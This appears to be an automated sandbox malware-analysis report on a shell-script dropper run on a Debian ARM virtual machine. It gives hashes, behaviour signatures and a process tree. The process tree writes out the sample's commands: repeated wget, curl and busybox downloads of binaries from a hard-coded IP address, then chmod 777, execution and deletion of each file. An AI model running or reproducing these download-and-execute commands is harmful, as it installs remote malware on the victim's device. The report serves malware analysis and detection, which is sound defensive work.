Analysis
-
max time kernel
30s -
max time network
57s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
10-11-2024 01:07
Static task
static1
Behavioral task
behavioral1
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
-
Size
10KB
-
MD5
28da49fd9438da5ee3fa13fc53b5bd0c
-
SHA1
bdd8fdf541c1c40a2327d0e17239da521f2a36cd
-
SHA256
183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d
-
SHA512
4e766537fa0871ce6cdf5c1ecd6605929600ce0e87b186b266f60fa72176f4ab499fd59c622b87fe08a5b10649e76c435768fb44dfbe90f513a08f17e3abc405
-
SSDEEP
96:gAsnGO60kOLUak421tkCWXLlkkPBN9ckCNwbTzzkcdfXLlkk8gBN9ckCFTgKYfkp:YQCCWXLlkk0NwbTvkclXLlkk+6kcaz28
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 18 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 743 chmod 800 chmod 806 chmod 812 chmod 850 chmod 874 chmod 699 chmod 818 chmod 885 chmod 775 chmod 830 chmod 838 chmod 856 chmod 868 chmod 794 chmod 824 chmod 844 chmod 862 chmod -
Executes dropped EXE 18 IoCs
Processes:
hn4vOKypY6CKycB9z93vRm66FOX5QZAMmRrcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7bFRa1rMvx2GvtXpSktMJMWFNDDvk6W53RcyKIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5wxG15jHBYjkoZj1q1BtTQEKqFzGftIzxbdaDBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPsrqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXMT6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6CKTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDpEDR1UpbD39KCMKH1vRgdxdHTl739rpD4YKLwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyEot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBegiGRcyu57Rl2Zclb9c8TaNBO8BooAcR3MwrqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXMT6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6CDBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPsLwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyEioc pid process /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR 700 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b 745 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X 795 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w 801 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda 807 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs 813 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM 819 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C 825 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp 831 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK 839 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE 845 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe 851 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw 857 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM 863 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C 869 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs 875 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE 886 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE -
Checks CPU configuration 1 TTPs 18 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 18 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C curl File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy curl File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp curl File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE curl File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs curl File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b curl File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda curl File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C curl File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM curl File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X curl File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK curl File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe curl File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM curl File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw curl File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE curl File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR curl File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w curl File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs curl
Processes
-
/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh1⤵PID:668
-
/bin/rm/bin/rm bins.sh2⤵PID:670
-
/usr/bin/wgetwget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵PID:672
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵PID:697
-
/bin/chmodchmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵
- File and Directory Permissions Modification
PID:699 -
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵
- Executes dropped EXE
PID:700 -
/bin/rmrm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR2⤵PID:701
-
/usr/bin/wgetwget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵PID:702
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵PID:710
-
/bin/chmodchmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵
- File and Directory Permissions Modification
PID:743 -
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵
- Executes dropped EXE
PID:745 -
/bin/rmrm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b2⤵PID:746
-
/usr/bin/wgetwget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵PID:748
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵PID:755
-
/bin/chmodchmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵
- File and Directory Permissions Modification
PID:775 -
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵
- Executes dropped EXE
PID:777 -
/bin/rmrm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy2⤵PID:778
-
/usr/bin/wgetwget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵PID:779
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵PID:793
-
/bin/chmodchmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵
- File and Directory Permissions Modification
PID:794 -
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵
- Executes dropped EXE
PID:795 -
/bin/rmrm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X2⤵PID:796
-
/usr/bin/wgetwget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵PID:797
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:798 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵PID:799
-
/bin/chmodchmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵
- File and Directory Permissions Modification
PID:800 -
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵
- Executes dropped EXE
PID:801 -
/bin/rmrm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w2⤵PID:802
-
/usr/bin/wgetwget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵PID:803
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵PID:805
-
/bin/chmodchmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵
- File and Directory Permissions Modification
PID:806 -
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵
- Executes dropped EXE
PID:807 -
/bin/rmrm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda2⤵PID:808
-
/usr/bin/wgetwget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:809
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:811
-
/bin/chmodchmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- File and Directory Permissions Modification
PID:812 -
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- Executes dropped EXE
PID:813 -
/bin/rmrm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:814
-
/usr/bin/wgetwget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:815
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:817
-
/bin/chmodchmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- File and Directory Permissions Modification
PID:818 -
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- Executes dropped EXE
PID:819 -
/bin/rmrm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:820
-
/usr/bin/wgetwget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:821
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:823
-
/bin/chmodchmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- File and Directory Permissions Modification
PID:824 -
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- Executes dropped EXE
PID:825 -
/bin/rmrm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:826
-
/usr/bin/wgetwget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵PID:827
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵PID:829
-
/bin/chmodchmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵
- File and Directory Permissions Modification
PID:830 -
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵
- Executes dropped EXE
PID:831 -
/bin/rmrm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp2⤵PID:832
-
/usr/bin/wgetwget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵PID:833
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵PID:837
-
/bin/chmodchmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵
- File and Directory Permissions Modification
PID:838 -
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵
- Executes dropped EXE
PID:839 -
/bin/rmrm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK2⤵PID:840
-
/usr/bin/wgetwget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:841
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:843
-
/bin/chmodchmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- File and Directory Permissions Modification
PID:844 -
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- Executes dropped EXE
PID:845 -
/bin/rmrm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:846
-
/usr/bin/wgetwget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵PID:847
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵PID:849
-
/bin/chmodchmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵
- File and Directory Permissions Modification
PID:850 -
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵
- Executes dropped EXE
PID:851 -
/bin/rmrm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵PID:852
-
/usr/bin/wgetwget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵PID:853
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵PID:855
-
/bin/chmodchmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵
- File and Directory Permissions Modification
PID:856 -
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵
- Executes dropped EXE
PID:857 -
/bin/rmrm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw2⤵PID:858
-
/usr/bin/wgetwget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:859
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:860 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:861
-
/bin/chmodchmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- File and Directory Permissions Modification
PID:862 -
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵
- Executes dropped EXE
PID:863 -
/bin/rmrm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM2⤵PID:864
-
/usr/bin/wgetwget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:865
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:866 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:867
-
/bin/chmodchmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- File and Directory Permissions Modification
PID:868 -
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵
- Executes dropped EXE
PID:869 -
/bin/rmrm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C2⤵PID:870
-
/usr/bin/wgetwget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:871
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:872 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:873
-
/bin/chmodchmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- File and Directory Permissions Modification
PID:874 -
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵
- Executes dropped EXE
PID:875 -
/bin/rmrm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs2⤵PID:876
-
/usr/bin/wgetwget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:877
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:884
-
/bin/chmodchmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE2⤵PID:887
-
/usr/bin/wgetwget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe2⤵PID:888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97